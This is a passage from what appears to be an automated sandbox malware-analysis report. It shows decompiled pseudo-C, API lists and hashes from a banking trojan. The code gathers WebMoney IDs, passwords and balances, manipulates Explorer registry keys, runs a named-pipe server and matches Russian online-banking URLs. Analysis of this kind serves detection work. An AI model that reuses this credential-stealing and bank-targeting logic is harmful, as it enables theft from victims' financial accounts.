        								goto L53;
        							}
        							__eflags = _v16 - _t155;
        							if(_v16 == _t155) {
        								L44:
        								_t119 = GetDlgItemTextA(_v12, 0x37b,  &_v332, 0xc7);
        								__eflags = _t119;
        								if(_t119 == 0) {
        									_t132 = 0x2d;
        									_v332 = _t132;
        									__eflags = 0;
        									_v330 = 0;
        								}
        								_v28 = 0x14;
        								_v32 = _t155;
        								_t123 = E004085D2(0x80000001, L"software\\webmoney", L"version",  &_v32,  &_v132,  &_v28);
        								__eflags = _t123;
        								if(_t123 == 0) {
        									L49:
        									_t124 = 0x2d;
        									_v132 = _t124;
        									__eflags = 0;
        									_v130 = 0;
        									goto L50;
        								} else {
        									__eflags = _v28 - 0x10;
        									if(_v28 != 0x10) {
        										goto L49;
        									}
        									__eflags = _v32 - 1;
        									if(__eflags == 0) {
        										L50:
        										_push(_v8);
        										_push( &_v132);
        										_push( &_v332);
        										_push("ults");
        										E0041352B(_t148, _t154, __eflags, 0xc8, _t155, _t155, L"WMKeeper data\n\nWMID: %S\nPassword: %S\nType: %S\nVersion: %s\n\nBalance:\n%S", "rlappedAccessResults");
        										_t163 = _t163 + 0x24;
        										_v16 = E0040F346(E0040F15E(_v16) | 0xffffffff, _v8);
        										goto L53;
        									}
        									goto L49;
        								}
        							}
        							_t154 = _t154 | 0xffffffff;
        							_t135 = E0040F65D(_t154, _t148, _t154, _v16);
        							__eflags = _t135;
        							if(_t135 == 0) {
        								goto L53;
        							}
        							goto L44;
        						}
        						goto L7;
        					}
        				}
        			}

        APIs
        • GetCurrentThread.KERNEL32 ref: 0040BFD7
        • SetThreadPriority.KERNEL32(00000000), ref: 0040BFDE
        • Sleep.KERNEL32(00002710), ref: 0040BFEE
        • GetWindowThreadProcessId.USER32(?,?), ref: 0040C014
        • GetDlgItem.USER32(?,000001A3), ref: 0040C02D
        • GetClassNameW.USER32(00000000,?,00000063), ref: 0040C046
        • SendMessageW.USER32(00000000,00001004,00000000,00000000), ref: 0040C075
        • SendMessageW.USER32(00000000,0000101F,00000000,00000000), ref: 0040C08D
        • SendMessageW.USER32(00000000), ref: 0040C094
        • FindWindowExW.USER32(00000000,00000000,00008002,?), ref: 0040C0B4
        • SendMessageW.USER32(?,00001005,00000000,?), ref: 0040C118
        • lstrcpy.KERNEL32(?,?), ref: 0040C13A
        • lstrcat.KERNEL32(?,004020A0), ref: 0040C1C3
        • GetDlgItemTextA.USER32(?,0000037B,?,000000C7), ref: 0040C28F
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: MessageSend$Thread$ItemWindow$ClassCurrentFindNamePriorityProcessSleepTextlstrcatlstrcpy
        • String ID: | $SysListView32$WMKeeper dataWMID: %SPassword: %SType: %SVersion: %sBalance:%S$rlappedAccessResults$software\webmoney$version
        • API String ID: 995943755-3800094676
        • Opcode ID: c457d868ef9cc28ef56fa886b64622119c3fe2c0e6648a8aada8bbcacfcf8b42
        • Instruction ID: ce090efd776d120814c5aa139271221565ebbd43b648cbc296a699e44edc8cef
        • Opcode Fuzzy Hash: c457d868ef9cc28ef56fa886b64622119c3fe2c0e6648a8aada8bbcacfcf8b42
        • Instruction Fuzzy Hash: 47A17C31D00218EADB219BE5CC85AEEBBB9EF45714F20427BE515F62E0D7384A81CF59
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 93%
        			E00408AED() {
        				void** _t94;
        				signed int _t99;
        				long _t113;
        				long _t121;
        				long _t130;
        				short* _t136;
        				int _t138;
        				char* _t139;
        				intOrPtr* _t143;
        				void* _t145;
        				void* _t156;
        				int _t163;
        				int _t167;
        				void* _t170;
        				void* _t172;
        
        				_t170 = _t172 - 0x6c;
        				_t156 =  *( *(_t170 + 0x7c));
        				_t163 = 0;
        				if(_t156 <= 0x10) {
        					L47:
        					return _t163;
        				}
        				 *(_t170 + 0x68) = 0;
        				if((_t156 - 0x00000010 & 0xfffffffe) <= 0) {
        					goto L47;
        				} else {
        					_t136 =  *( *(_t170 + 0x78));
        					_t143 = _t136;
        					while( *_t143 != _t163) {
        						 *(_t170 + 0x68) =  *(_t170 + 0x68) + 1;
        						_t143 = _t143 + 2;
        						if( *(_t170 + 0x68) < _t156 - 0x10 >> 1) {
        							continue;
        						} else {
        							L46:
        							goto L47;
        						}
        					}
        					_t145 = E0040F649(_t136) + _t80;
        					_t150 = _t145 + _t136 + 2;
        					 *(_t170 + 0x64) = _t145 + _t136 + 2 + 0x10;
        					 *(_t170 + 0x60) = _t136 -  *(_t170 + 0x64) + _t156;
        					if(_t156 - _t145 + 2 < 0x10) {
        						goto L46;
        					}
        					E004086BF(_t170 - 4, _t150);
        					if( *_t136 != 0x2a ||  *((intOrPtr*)(_t136 + 2)) != 0) {
        						E004101CA(_t170 + 0x4c, _t136, E0040F649(_t136) + _t86);
        						E004086BF(_t170 - 0x54, _t170 + 0x4c);
        						PathCombineW(_t170 - 0x25c, L"software\\microsoft\\windows\\currentversion\\explorer", _t170 - 0x54);
        						_t138 =  *(_t170 + 0x74);
        						_t94 = _t170 + 0x68;
        						if(_t138 != 0xf) {
        							_t99 = RegOpenKeyExW(0x80000001, _t170 - 0x25c, 0, (0 | _t138 == 0x00000011) + 1, _t94);
        						} else {
        							_t99 = RegCreateKeyExW(0x80000001, _t170 - 0x25c, 0, 0, 0, 2, 0, _t94, 0);
        						}
        						asm("sbb esi, esi");
        						_t163 =  ~_t99 + 1;
        						if(_t163 == 0) {
        							goto L46;
        						} else {
        							if(_t138 != 0xf) {
        								if(_t138 != 0x11) {
        									if(_t138 == 0x10) {
        										_t163 = 0;
        										if(RegQueryValueExW( *(_t170 + 0x68), _t170 - 4, 0, 0, 0, _t170 + 0x74) == 0) {
        											_t104 =  *(_t170 + 0x74);
        											if( *(_t170 + 0x74) != 0) {
        												_t139 = E0040F14B(_t104);
        												if(_t139 != 0) {
        													if(RegQueryValueExW( *(_t170 + 0x68), _t170 - 4, 0, 0, _t139, _t170 + 0x74) != 0) {
        														E0040F15E(_t139);
        													} else {
        														_t167 =  *(_t170 + 0x78);
        														E0040F15E( *_t167);
        														 *_t167 = _t139;
        														_t163 =  *(_t170 + 0x74);
        														 *( *(_t170 + 0x7c)) = _t163;
        													}
        												}
        											}
        										}
        									}
        									L44:
        									_push( *(_t170 + 0x68));
        									goto L45;
        								}
        								_t113 = RegDeleteValueW( *(_t170 + 0x68), _t170 - 4);
        								L36:
        								asm("sbb esi, esi");
        								_t163 =  ~_t113 + 1;
        								goto L44;
        							}
        							_t113 = RegSetValueExW( *(_t170 + 0x68), _t170 - 4, 0, 3,  *(_t170 + 0x64),  *(_t170 + 0x60));
        							goto L36;
        						}
        					} else {
        						if(RegOpenKeyExW(0x80000001, L"software\\microsoft\\windows\\currentversion\\explorer", 0, 8, _t170 + 0x5c) != 0) {
        							goto L46;
        						} else {
        							 *(_t170 + 0x78) = 0;
        							while(1) {
        								 *(_t170 + 0x7c) = 0x28;
        								_t121 = RegEnumKeyExW( *(_t170 + 0x5c),  *(_t170 + 0x78), _t170 - 0x54, _t170 + 0x7c, 0, 0, 0, _t170 + 0x54);
        								if(_t121 == 0xea) {
        									goto L26;
        								}
        								if(_t121 != 0) {
        									_push( *(_t170 + 0x5c));
        									L45:
        									RegCloseKey();
        									goto L46;
        								}
        								if( *(_t170 + 0x7c) == 0x26 &&  *(_t170 - 0x54) == 0x7b &&  *((short*)(_t170 - 0xa)) == 0x7d) {
        									PathCombineW(_t170 - 0x25c, L"software\\microsoft\\windows\\currentversion\\explorer", _t170 - 0x54);
        									if( *(_t170 + 0x74) != 0x11) {
        										if( *(_t170 + 0x74) != 0xf) {
        											 *(_t170 + 0x68) = 0;
        											L25:
        											RegCloseKey( *(_t170 + 0x68));
        											goto L26;
        										}
        										if(RegCreateKeyExW(0x80000001, _t170 - 0x25c, 0, 0, 0, 2, 0, _t170 + 0x68, 0) == 0) {
        											_t130 = RegSetValueExW( *(_t170 + 0x68), _t170 - 4, 0, 3,  *(_t170 + 0x64),  *(_t170 + 0x60));
        											L22:
        											if(_t130 == 0) {
        												_t163 = _t163 + 1;
        											}
        										}
        										goto L25;
        									}
        									if(RegOpenKeyExW(0x80000001, _t170 - 0x25c, 0, 2, _t170 + 0x68) != 0) {
        										goto L25;
        									} else {
        										_t130 = RegDeleteValueW( *(_t170 + 0x68), _t170 - 4);
        										goto L22;
        									}
        								}
        								L26:
        								 *(_t170 + 0x78) =  *(_t170 + 0x78) + 1;
        							}
        						}
        					}
        				}
        			}

        APIs
        • RegOpenKeyExW.ADVAPI32(80000001,software\microsoft\windows\currentversion\explorer,00000000,00000008,?), ref: 00408B9A
        • RegEnumKeyExW.ADVAPI32(?,?,?,?,00000000,00000000,00000000,?), ref: 00408BC7
        • PathCombineW.SHLWAPI(?,software\microsoft\windows\currentversion\explorer,?), ref: 00408C10
        • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000002,?), ref: 00408C2B
        • RegDeleteValueW.ADVAPI32(?,?), ref: 00408C3C
        • RegCreateKeyExW.ADVAPI32(80000001,?,00000000,00000000,00000000,00000002,00000000,?,00000000), ref: 00408C5D
        • RegSetValueExW.ADVAPI32(?,?,00000000,00000003,?,?), ref: 00408C77
          • Part of subcall function 004101CA: CryptAcquireContextW.ADVAPI32(#A,00000000,00000000,00000001,F0000040,?,0041230D,00000000,?,-0000001C,00000000,?,?,?), ref: 004101E3
          • Part of subcall function 004101CA: CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 004101FB
          • Part of subcall function 004101CA: CryptHashData.ADVAPI32(?,00000010), ref: 00410216
          • Part of subcall function 004101CA: CryptGetHashParam.ADVAPI32(?,00000002,?,00000010,00000000), ref: 0041022D
          • Part of subcall function 004101CA: CryptDestroyHash.ADVAPI32(?), ref: 00410244
          • Part of subcall function 004101CA: CryptReleaseContext.ADVAPI32(?,00000000), ref: 0041024E
        • RegCloseKey.ADVAPI32(?), ref: 00408C8A
        • PathCombineW.SHLWAPI(?,software\microsoft\windows\currentversion\explorer,?,?,?,00000000), ref: 00408CCF
        • RegCreateKeyExW.ADVAPI32(80000001,?,00000000,00000000,00000000,00000002,00000000,?,00000000,?,00000000), ref: 00408CF4
        • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?,?,00000000), ref: 00408D14
        • RegSetValueExW.ADVAPI32(?,?,00000000,00000003,?,?,?,00000000), ref: 00408D3E
        • RegDeleteValueW.ADVAPI32(?,?,?,00000000), ref: 00408D52
          • Part of subcall function 0040F15E: HeapFree.KERNEL32(00000000,00000000,0040AD5B,00000000,00000001), ref: 0040F171
        • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00408D76
        • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00408DA0
        • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00408DC9
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: CryptValue$Hash$CreateOpen$CloseCombineContextDeletePathQuery$AcquireDataDestroyEnumFreeHeapParamRelease
        • String ID: *$software\microsoft\windows\currentversion\explorer
        • API String ID: 1179558880-1506458415
        • Opcode ID: 7fab160a00c92f07773720b11c3ed80d8b7178bdb7f9b8aefebef46c99abfa12
        • Instruction ID: d6b04ee6cc9bd758e60b8eb28b5d7a8422b939a61d2d3aa49b95f6fa866d5de9
        • Opcode Fuzzy Hash: 7fab160a00c92f07773720b11c3ed80d8b7178bdb7f9b8aefebef46c99abfa12
        • Instruction Fuzzy Hash: 5F914971500209AFEB20DFA1CD88DEE7BB9EF95740F20413AF951A6191EA349D45CBA8
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E00406E24(void* __eflags) {
        				intOrPtr _v12;
        				intOrPtr _v20;
        				void* __ecx;
        				void* __esi;
        				intOrPtr _t23;
        				WCHAR* _t27;
        				void* _t28;
        				WCHAR* _t29;
        				void* _t30;
        				intOrPtr _t31;
        				intOrPtr _t33;
        				void* _t34;
        				intOrPtr _t35;
        				long _t38;
        				intOrPtr _t39;
        				intOrPtr _t41;
        				intOrPtr _t47;
        				signed int _t49;
        				intOrPtr _t57;
        				intOrPtr _t59;
        				intOrPtr _t61;
        				void* _t64;
        				intOrPtr _t65;
        				void* _t68;
        				void* _t70;
        
        				E0040882D();
        				 *0x4147d4 = CreateEventW(0, 1, 0, 0);
        				E0040AE3C(0x4147e0);
        				_t23 =  *0x414ad4; // 0x241f5a8
        				PathCombineW(0x4147e0, 0x4147e0,  *(_t23 + 0xc));
        				 *0x4147dc = CreateFileW(0x4147e0, 0x80000000, 0, 0, 3, 0, 0);
        				E0040B30C();
        				_t27 = L00404155();
        				 *0x4147cc = _t27;
        				_t28 = CreateFileW(_t27, 0x80000000, 0, 0, 4, 0, 0);
        				 *0x4147d8 = _t28;
        				if(_t28 == 0xffffffff) {
        					 *0x4147d8 = 0;
        				}
        				_t29 = E00412C8D();
        				 *0x4147d0 = _t29;
        				_t30 = CreateFileW(_t29, 0x80000000, 0, 0, 4, 0, 0);
        				 *0x4149e8 = _t30;
        				_t73 = _t30 - 0xffffffff;
        				if(_t30 == 0xffffffff) {
        					 *0x4149e8 = 0;
        				}
        				_t31 =  *0x414ad4; // 0x241f5a8
        				_v20 = E0040A8E2(_t64, _t73, E00406CA1,  *((intOrPtr*)(_t31 + 0x2c)));
        				_t33 =  *0x414ad4; // 0x241f5a8
        				_t34 = E0040AA0E( *((intOrPtr*)(_t33 + 0x28)));
        				_t74 = _t34;
        				if(_t34 != 0) {
        					_t59 =  *0x414ad4; // 0x241f5a8
        					E0040AA33(_t74,  *((intOrPtr*)(_t59 + 0x28)), 3, 0, 0, 0, 0);
        					while(1) {
        						_t61 =  *0x414ad4; // 0x241f5a8
        						if(E0040AA0E( *((intOrPtr*)(_t61 + 0x28))) == 0) {
        							goto L8;
        						}
        						Sleep(0x14);
        					}
        				}
        				L8:
        				_t70 = E0040A191;
        				do {
        					_t35 =  *0x414ad4; // 0x241f5a8
        					if(E0040AA0E( *((intOrPtr*)(_t35 + 0x28))) == 0) {
        						_t65 =  *0x414ad4; // 0x241f5a8
        						_t49 = 0;
        						_t68 = E0040B135( *((intOrPtr*)(_t65 + ((_t49 & 0xffffff00 | ( *0x414be8 & 0x00000001) != 0x00000000) + 5) * 4)));
        						while(E00407DA0(0, _t65, _t70 -  *0x414ca0, _t68) == 0) {
        							Sleep(0x14);
        						}
        						while(1) {
        							_t57 =  *0x414ad4; // 0x241f5a8
        							if(E0040AA0E( *((intOrPtr*)(_t57 + 0x28))) != 0) {
        								goto L16;
        							}
        							Sleep(0x14);
        						}
        					}
        					L16:
        					E0040B355(0x4147e0);
        					Sleep(0x64);
        					_t38 = WaitForSingleObject( *0x4147d4, 0x32);
        					_t80 = _t38;
        				} while (_t38 != 0);
        				_t39 =  *0x414ad4; // 0x241f5a8
        				E0040AA33(_t80,  *((intOrPtr*)(_t39 + 0x28)), 3, 0, 0, 0, 0);
        				while(1) {
        					_t41 =  *0x414ad4; // 0x241f5a8
        					if(E0040AA0E( *((intOrPtr*)(_t41 + 0x28))) == 0) {
        						break;
        					}
        					Sleep(0x14);
        				}
        				CloseHandle( *0x4147d4);
        				CloseHandle( *0x4147d8);
        				CloseHandle( *0x4149e8);
        				CloseHandle( *0x4147dc);
        				_t47 =  *0x414ad4; // 0x241f5a8
        				return E0040A9B9(_v12,  *((intOrPtr*)(_t47 + 0x2c)));
        			}

        APIs
        • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 00406E35
          • Part of subcall function 0040AE3C: SHGetSpecialFolderPathW.SHELL32(00000000,?,?,00000001,004069ED,?,?), ref: 0040AE5D
        • PathCombineW.SHLWAPI(004147E0,004147E0,?), ref: 00406E56
        • CreateFileW.KERNEL32(004147E0,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00406E69
          • Part of subcall function 0040B30C: PathCombineW.SHLWAPI(?,?,0241F5A8), ref: 0040B32F
          • Part of subcall function 0040B30C: CreateDirectoryW.KERNEL32(?,00000000), ref: 0040B33E
          • Part of subcall function 0040B30C: SetFileAttributesW.KERNEL32(?,00000006), ref: 0040B34D
        • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000004,00000000,00000000), ref: 00406E8B
        • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000004,00000000,00000000), ref: 00406EB3
        • Sleep.KERNEL32(00000014,?,?,00000003,00000000,00000000,00000000,00000000,?,Function_00006CA1,?), ref: 00406F07
        • Sleep.KERNEL32(00000014,-0000AB0F,00000000,0241F5A8,?,?,Function_00006CA1,?), ref: 00406F58
        • Sleep.KERNEL32(00000014,?,-0000AB0F,00000000), ref: 00406F77
        • Sleep.KERNEL32(00000064,004147E0,?,?,Function_00006CA1,?), ref: 00406F96
        • WaitForSingleObject.KERNEL32(00000032), ref: 00406FA4
        • Sleep.KERNEL32(00000014,?,?,00000003,00000000,00000000,00000000,00000000), ref: 00406FC9
          • Part of subcall function 0040A9B9: SetEvent.KERNEL32(?,00000000,0040A179,?), ref: 0040A9C3
          • Part of subcall function 0040A9B9: WaitForSingleObject.KERNEL32(?,000000FF,0000EA60,00000000,00000000,00000000,00000000,00000000), ref: 0040A9DC
          • Part of subcall function 0040A9B9: CloseHandle.KERNEL32(00000004), ref: 0040A9E4
          • Part of subcall function 0040A9B9: CloseHandle.KERNEL32(?), ref: 0040A9ED
          • Part of subcall function 0040A9B9: CloseHandle.KERNEL32(?), ref: 0040A9F6
        • CloseHandle.KERNEL32(?), ref: 00406FE6
        • CloseHandle.KERNEL32 ref: 00406FF2
        • CloseHandle.KERNEL32 ref: 00406FFE
        • CloseHandle.KERNEL32 ref: 0040700A
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: CloseHandle$CreateSleep$File$Path$CombineEventObjectSingleWait$AttributesDirectoryFolderSpecial
        • String ID: GetScrollRange$tClassLongW
        • API String ID: 4283066563-669566137
        • Opcode ID: 8596471a9fcb103a0491848a5fd4902ba1c5425abc6ad4e284b64256fefb4776
        • Instruction ID: bc6704ec4c5eea54e9a00987a3c30989331ad5c6e3c99f62b68ed883e491ae67
        • Opcode Fuzzy Hash: 8596471a9fcb103a0491848a5fd4902ba1c5425abc6ad4e284b64256fefb4776
        • Instruction Fuzzy Hash: 02517D71240241AFCA21AF62FD49EC73B79EFC5754B12803AB605AB2F1D7754821DB2D
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 95%
        			E00409FEA() {
        				char _v12;
        				HANDLE* _v48;
        				long _v52;
        				void _v64;
        				intOrPtr _v92;
        				void* __esi;
        				void* _t28;
        				intOrPtr _t33;
        				intOrPtr _t40;
        				intOrPtr _t43;
        				void* _t48;
        				void* _t53;
        				signed int _t54;
        				void* _t56;
        				HANDLE* _t59;
        				intOrPtr _t67;
        				intOrPtr _t69;
        				intOrPtr _t70;
        
        				E0040F21C( &_v12,  &_v12, 0, 8);
        				L00404155();
        				E00412C8D();
        				E0040882D();
        				 *0x414ed4("ssLongW", _t53, _t56, _t48);
        				E00412126();
        				E0040F21C(SetThreadPriority(GetCurrentThread(), 2), "atorA", 0, 0x10);
        				 *0x414a30 = CreateEventW(0, 1, 0, 0);
        				E00412C4A();
        				_t28 = InternetOpenA( *0x4155d4, 0, 0, 0, 0);
        				 *0x414a34 = _t28;
        				_v64 = 0xea60;
        				InternetSetOptionA(_t28, 2,  &_v64, 4);
        				E0040AEF2(0);
        				E00407A50(0x4141dc,  &_v64, 0,  *0x414d18);
        				_t33 =  *0x414ad4; // 0x241f5a8
        				_v92 = E0040A8E2( &_v64, 0, E00409E78,  *((intOrPtr*)(_t33 + 0x28)));
        				 *0x4147a2 = 0;
        				 *0x414a2c = 0;
        				L1:
        				L1:
        				if(WaitForSingleObject( *0x414a30, 0x14) == 0) {
        					 *0x414a2c = 1;
        				}
        				_t67 =  *0x414a2c; // 0x726f7461
        				if(_t67 != 0) {
        					goto L9;
        				}
        				_t43 =  *0x414ad4; // 0x241f5a8
        				if(E0040AA0E( *((intOrPtr*)(_t43 + 0x30))) != 0) {
        					goto L1;
        				} else {
        					_t69 =  *0x414a2c; // 0x726f7461
        					if(_t69 == 0) {
        						E00409EBA( &_v52);
        						WaitForSingleObject( *0x414a30, 0xffffffff);
        						while(1) {
        							_t70 =  *0x414a2c; // 0x726f7461
        							if(_t70 <= 0) {
        								goto L9;
        							}
        							Sleep(0x14);
        						}
        					}
        				}
        				L9:
        				_t59 = _v48;
        				WaitForMultipleObjects(_v52, _t59, 1, 0xffffffff);
        				_t54 = 0;
        				if(_v52 > 0) {
        					do {
        						CloseHandle(_t59[_t54]);
        						_t54 = _t54 + 1;
        					} while (_t54 < _v52);
        				}
        				E0040F15E(_t59);
        				CloseHandle( *0x414a30);
        				InternetCloseHandle( *0x414a34);
        				_t40 =  *0x414ad4; // 0x241f5a8
        				return E0040A9B9(_v64,  *((intOrPtr*)(_t40 + 0x28)));
        			}

        APIs
          • Part of subcall function 00412C8D: PathCombineW.SHLWAPI(?,0241F5A8,?), ref: 00412CB4
          • Part of subcall function 00412C8D: PathCombineW.SHLWAPI(yNameW,yNameW,?), ref: 00412CC3
        • RtlInitializeCriticalSection.NTDLL(ssLongW), ref: 0040A019
        • GetCurrentThread.KERNEL32 ref: 0040A026
        • SetThreadPriority.KERNEL32(00000000), ref: 0040A02D
        • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,atorA,00000000,00000010), ref: 0040A047
        • InternetOpenA.WININET(00000000,00000000,00000000,00000000), ref: 0040A061
        • InternetSetOptionA.WININET ref: 0040A07E
          • Part of subcall function 0040AEF2: CharLowerBuffA.USER32(00000000,00000031,?,?,?,?,00000001,?,00000002), ref: 0040B025
          • Part of subcall function 0040A8E2: RtlAllocateHeap.NTDLL(00000008,00000018,?), ref: 0040A905
        • WaitForSingleObject.KERNEL32(00000014,00409E78,?), ref: 0040A0C5
        • WaitForSingleObject.KERNEL32(000000FF,?), ref: 0040A108
        • Sleep.KERNEL32(00000014), ref: 0040A112
        • WaitForMultipleObjects.KERNEL32(0000EA60,0000EA60,00000001,000000FF), ref: 0040A12C
        • CloseHandle.KERNEL32(0000EA60), ref: 0040A13D
        • CloseHandle.KERNEL32(0000EA60), ref: 0040A156
        • InternetCloseHandle.WININET ref: 0040A162
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: CloseHandleInternetWait$CombineObjectPathSingleThread$AllocateBuffCharCreateCriticalCurrentEventHeapInitializeLowerMultipleObjectsOpenOptionPrioritySectionSleep
        • String ID: `$atorA$ssLongW
        • API String ID: 2138626244-1144290972
        • Opcode ID: d0cfa77d0ea6f0d7d7a17ed41bacee77849ef1c229a2d3ffa27711e9f8b7cc92
        • Instruction ID: ccaa77ce3a4ebbf72ecbb8a1b2b60922b1b3ce95fef9568e287d169e41787bf1
        • Opcode Fuzzy Hash: d0cfa77d0ea6f0d7d7a17ed41bacee77849ef1c229a2d3ffa27711e9f8b7cc92
        • Instruction Fuzzy Hash: 50419FB1594300AFCB10AFA1ED49DDB7B68FF84395B01843AF211A25E1DB744824DF6E
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 96%
        			E0040A75A(void _a4) {
        				long _v8;
        				void _v12;
        				struct _OVERLAPPED* _v16;
        				void* _v20;
        				void _t59;
        				void* _t71;
        				long _t75;
        				void** _t81;
        
        				_t81 = _a4;
        				_v20 = CreateMutexW(0x4155b4, 0, _t81[4]);
        				SetEvent(_t81[2]);
        				DisconnectNamedPipe( *_t81);
        				if(WaitForSingleObject(_t81[1], 0) != 0) {
        					_t75 = 4;
        					do {
        						if(ConnectNamedPipe( *_t81, 0) == 1) {
        							_v12 = 0;
        							_v8 = 0;
        							_v16 = 0;
        							_a4 = 0;
        							if(ReadFile( *_t81,  &_v12, _t75,  &_v8, 0) != 0 && _v8 == _t75 && ReadFile( *_t81,  &_a4, _t75,  &_v8, 0) != 0 && _v8 == _t75) {
        								_t59 = _a4;
        								if(_t59 > 0xa00000) {
        									_t59 = 0;
        									_a4 = 0;
        								}
        								if(_t59 <= 0) {
        									L13:
        									_v12 = _t81[3]( &_a4);
        									WriteFile( *_t81,  &_v12, _t75,  &_v8, 0);
        									if(_a4 > 0xa00000) {
        										_a4 = 0;
        									}
        									WriteFile( *_t81,  &_a4, _t75,  &_v8, 0);
        									if(_a4 != 0) {
        										WriteFile( *_t81, _v16, _a4,  &_v8, 0);
        									}
        									FlushFileBuffers( *_t81);
        								} else {
        									_t71 = E0040F14B(_t59);
        									_v16 = _t71;
        									if(_t71 != 0 && ReadFile( *_t81, _t71, _a4,  &_v8, 0) != 0 && _v8 == _a4) {
        										goto L13;
        									}
        								}
        							}
        							E0040F15E(_v16);
        							DisconnectNamedPipe( *_t81);
        						}
        					} while (WaitForSingleObject(_t81[1], 0) != 0);
        				}
        				CloseHandle(_v20);
        				SetEvent(_t81[2]);
        				_push(0);
        				return RtlExitUserThread();
        			}

        APIs
        • CreateMutexW.KERNEL32(004155B4,00000000,?), ref: 0040A770
        • SetEvent.KERNEL32(?), ref: 0040A77C
        • DisconnectNamedPipe.KERNEL32(?), ref: 0040A784
        • WaitForSingleObject.KERNEL32(?,00000000), ref: 0040A78E
        • ConnectNamedPipe.KERNEL32(?,00000000), ref: 0040A7A3
        • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 0040A7CA
        • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 0040A7ED
        • ReadFile.KERNEL32(?,00000000,?,?,00000000), ref: 0040A82E
        • WriteFile.KERNEL32(?,?,00000004,?,00000000), ref: 0040A85C
        • WriteFile.KERNEL32(?,00A00000,00000004,?,00000000), ref: 0040A87A
        • WriteFile.KERNEL32(?,?,00A00000,?,00000000), ref: 0040A892
        • FlushFileBuffers.KERNEL32(?), ref: 0040A89A
        • DisconnectNamedPipe.KERNEL32(?,?), ref: 0040A8AA
        • WaitForSingleObject.KERNEL32(?,00000000), ref: 0040A8B4
        • CloseHandle.KERNEL32(?), ref: 0040A8C6
        • SetEvent.KERNEL32(?), ref: 0040A8CF
        • RtlExitUserThread.NTDLL(00000000), ref: 0040A8D6
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: File$NamedPipeReadWrite$DisconnectEventObjectSingleWait$BuffersCloseConnectCreateExitFlushHandleMutexThreadUser
        • String ID:
        • API String ID: 1315446275-0
        • Opcode ID: 32c50313d7e46f667d15ab92ca2a2faa0f67596a8f396ea6274a29db632bfc1e
        • Instruction ID: 18f26e943705bdab19a4cacb318ddba564a9e94c024cb9a33cacf93ada1bc755
        • Opcode Fuzzy Hash: 32c50313d7e46f667d15ab92ca2a2faa0f67596a8f396ea6274a29db632bfc1e
        • Instruction Fuzzy Hash: 00511876800208FFDB21AF90DD48DEEBBB9FF84341B10843AF542E6160D7359A51DB58
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 80%
        			E0040BAF5(void* __edx, char* __esi, intOrPtr _a4) {
        				long _v8;
        				char _v11;
        				char _v12;
        				signed int _v16;
        				void* _v20;
        				char* _v24;
        				char* _v28;
        				int _v68;
        				char* _v72;
        				void _v80;
        				void* _v88;
        				char _v348;
        				void _v1372;
        				void* __ebx;
        				char _t86;
        				intOrPtr _t96;
        				void* _t110;
        				intOrPtr _t125;
        				int _t135;
        				short _t136;
        				signed int _t137;
        				intOrPtr* _t142;
        				intOrPtr _t143;
        				long _t145;
        				int _t146;
        				intOrPtr _t148;
        				intOrPtr _t149;
        				intOrPtr _t150;
        				char* _t154;
        				void* _t160;
        				signed char* _t161;
        				signed int _t163;
        				void* _t164;
        				intOrPtr* _t166;
        				char* _t168;
        				void* _t169;
        
        				_t168 = __esi;
        				_v16 = _v16 | 0xffffffff;
        				_t172 = __esi[0x414];
        				if(__esi[0x414] == 0) {
        					L25:
        					if(_t168[0x41c] > 0x96000) {
        						L61:
        						return 1;
        					}
        					_v28 = "https://ibank*.ru/*";
        					_v24 = "https://bc.nsk.*.ru/*";
        					_v12 = 0x13;
        					_v11 = 0x15;
        					_t161 =  &_v12;
        					_t142 =  &_v28;
        					_v20 = 2;
        					do {
        						_t158 =  *_t161 & 0x000000ff;
        						if(E0040A3D4( *_t142,  *_t161 & 0x000000ff, _t168, _t168[0x400], 0, 0, 2) != 0) {
        							_v16 = 1;
        							 *0x41479c = 1;
        							E004063F9();
        						}
        						_t161 =  &(_t161[1]);
        						_t142 = _t142 + 4;
        						_t34 =  &_v20;
        						 *_t34 = _v20 - 1;
        					} while ( *_t34 != 0);
        					if( *0x41479f == 0) {
        						_push("https://www.faktura.ru/enter.jsp?site=");
        						_t158 = 0x26;
        						if(E0040F65D(_t168[0x400] - 1, _t168, _t158) == 0) {
        							 *0x41479f = 1;
        						}
        					}
        					if(_v16 != 0xffff) {
        						L38:
        						_t86 = _t168[0x41c];
        						_t143 = 0;
        						if(_t86 <= 0) {
        							L47:
        							_v20 = 0;
        							_v12 = 0;
        							_t163 = 0xc;
        							if(_t168[4] != 0x73 || _t168[5] != 0x3a) {
        								L50:
        								_v16 = 0xb;
        								goto L51;
        							} else {
        								_v16 = _t163;
        								if(_t168[6] == 0x2f) {
        									L51:
        									_push( &_v20);
        									_push( &_v12);
        									E004065FE();
        									if(_v16 == _t163) {
